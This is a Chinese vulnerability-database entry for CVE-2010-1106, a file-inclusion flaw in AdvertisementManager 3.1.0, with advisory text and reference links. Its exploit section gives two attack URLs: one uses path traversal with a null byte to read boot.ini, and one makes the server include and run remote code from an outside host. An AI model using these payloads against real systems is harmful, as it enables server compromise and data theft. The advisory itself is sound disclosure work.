AdvertisementManager 'cgi/index.php' PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1118928 漏洞类型 代码注入
发布时间 2010-01-19 更新时间 2010-01-19
CVE编号 CVE-2010-1106 CNNVD-ID CNNVD-201003-371
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/34849
https://www.securityfocus.com/bid/44165
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201003-371
|漏洞详情
AdvertisementManager的脚本cgi/index.php存在PHP远程文件包含漏洞。远程攻击者可以借助req参数的URL,执行任意PHP代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/44165/info

AdvertisementManager is prone to local and remote file-include vulnerabilities because the application fails to sufficiently sanitize user-supplied input.

Exploiting these issues may allow a remote attacker to obtain sensitive information or compromise the application and the underlying computer; other attacks are also possible.

AdvertisementManager 3.1.0 is vulnerable; other versions may also be affected. 

http://www.example.com/Advertisement/cgi/index.php?usr=indoushka&passw=indoushka&savelogin=on&admin=Enter&req=../../../../../../../../boot.ini%00

http://www.example.com/Advertisement/cgi/index.php?usr=indoushka&passw=indoushka&savelogin=on&admin=Enter&req=http://www.example.com/c.txt?
|受影响的产品
AdvertisementManager AdvertisementManager 3.1
|参考资料

来源:XF
名称:advertisementmanager-index-file-include(55756)
链接:http://xforce.iss.net/xforce/xfdb/55756
来源:MISC
链接:http://www.packetstormsecurity.com/1001-exploits/advertisemanager-xssrfitraversal.txt